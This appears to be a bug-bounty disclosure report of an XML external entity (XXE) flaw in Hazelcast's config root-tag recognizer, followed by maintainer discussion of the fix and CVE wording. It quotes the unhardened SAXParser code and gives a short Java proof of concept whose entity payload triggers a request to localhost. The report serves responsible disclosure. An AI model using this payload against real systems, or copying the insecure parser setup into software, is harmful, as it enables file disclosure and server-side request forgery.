Improper Restriction of XML External Entity Reference in hazelcast/hazelcast

Valid

Reported on

Jan 16th 2022


Description

The AbstractXmlConfigRootTagRecognizer() function makes use of SAXParser generated from a SAXParserFactory with no FEATURE_SECURE_PROCESSING set, allowing for XXE attacks. In https://github.com/hazelcast/hazelcast/blob/f373d8e05f0258a8e5e817a46b16ed4e32278bd3/hazelcast/src/main/java/com/hazelcast/internal/config/AbstractXmlConfigRootTagRecognizer.java#L56-L65

        public AbstractXmlConfigRootTagRecognizer(String expectedRootNode) throws Exception {
        this.expectedRootNode = expectedRootNode;
        SAXParserFactory factory = SAXParserFactory.newInstance();
        saxParser = factory.newSAXParser();
    }

    @Override
    public boolean isRecognized(ConfigStream configStream) throws Exception {
        MemberHandler memberHandler = new MemberHandler(expectedRootNode);
        try {
            saxParser.parse(configStream, memberHandler);
        }

Proof of Concept

Extracted out the key function mentioned above to showcase how it can be exploited.

import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.HandlerBase;

import java.io.ByteArrayInputStream;

public class Poc {

    public static void main(String[] args) {        
        try {
            String xmlpoc = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]><foo>&xxe;</foo>";
            SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser();
            saxParser.parse(new ByteArrayInputStream(xmlpoc.getBytes()), new HandlerBase());
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Causes an SSRF to http://127.0.0.1

Impact

This vulnerability is capable of XXE to disclose data/conduct SSRF attacks etc.

We are processing your report and will contact the hazelcast team within 24 hours. 4 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 4 months ago
Josef Cacek validated this vulnerability 4 months ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
Josef Cacek
4 months ago

Maintainer


The fix is on the way: https://github.com/hazelcast/hazelcast/pull/20407

Josef Cacek
4 months ago

Maintainer


Even the class is not new, the only affected version seems to be the enterprise version of the latest beta (5.1-BETA-1). I didn't find a valid call path (other than ones from tests) in previous releases.

Jamie Slome
4 months ago

Admin


With this PR merged, has this been fixed? If so, we can go ahead and confirm the fix against the report ♥️

Josef Cacek
4 months ago

Maintainer


The PR is merged and the fix will be included in Hazelcast 5.1. I would like to publish the report after the new version is released. The plan is to have the new version out in February.

Jamie Slome
4 months ago

Admin


Okay, thanks for the update Josef and that makes sense.

We will confirm the fix for this report once you are ready to publish the report!

Josef Cacek confirmed that a fix has been merged on 4d6b66 3 months ago
The fix bounty has been dropped
Josef Cacek
2 months ago

Maintainer


@jamieslome, how we can change the description of the CVE to explicitly state the vulnerable version (5.1-BETA-1)? It currently says "repository hazelcast/hazelcast prior to 5.1."

Jamie Slome
2 months ago

Admin


@kwart - I have updated the CVE for you 👍

https://github.com/CVEProject/cvelist/pull/5209/files

The description will now reflect the vulnerable version instead of 5.1. Please allow 1 hour for the CVE to update.

Josef Cacek
2 months ago

Maintainer


Thanks, Jamie.

to join this conversation